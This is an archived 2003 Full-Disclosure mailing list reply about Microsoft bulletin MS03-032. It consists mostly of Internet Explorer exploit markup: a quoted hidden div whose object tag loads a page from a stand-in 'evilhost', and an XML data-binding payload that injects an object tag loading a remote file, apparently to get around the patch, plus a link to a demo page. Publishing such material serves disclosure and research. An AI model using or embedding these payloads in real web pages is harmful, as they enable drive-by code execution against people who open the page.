[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032

To: <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
From: "http-equiv@xxxxxxxxxx" <1@xxxxxxxxxxx>
Date: Mon, 8 Sep 2003 11:10:18 -0000



 
> this works too...
> 
> <div style="display.none"><object 
data="http://evilhost/realbad.asp";>
> </object>oh</div>


http://www.malware.com/greymagic.html


<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object id="oFile" data="badnews.php"></object>
            ]]>
        </exploit>
    </security>
</xml>

-- 
http://www.malware.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
  - From: morning_wood

Prev by Date: Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
Next by Date: RE: [Full-Disclosure] Product activation is exploitable
Previous by thread: Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
Next by thread: Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
Index(es):
- Date
- Thread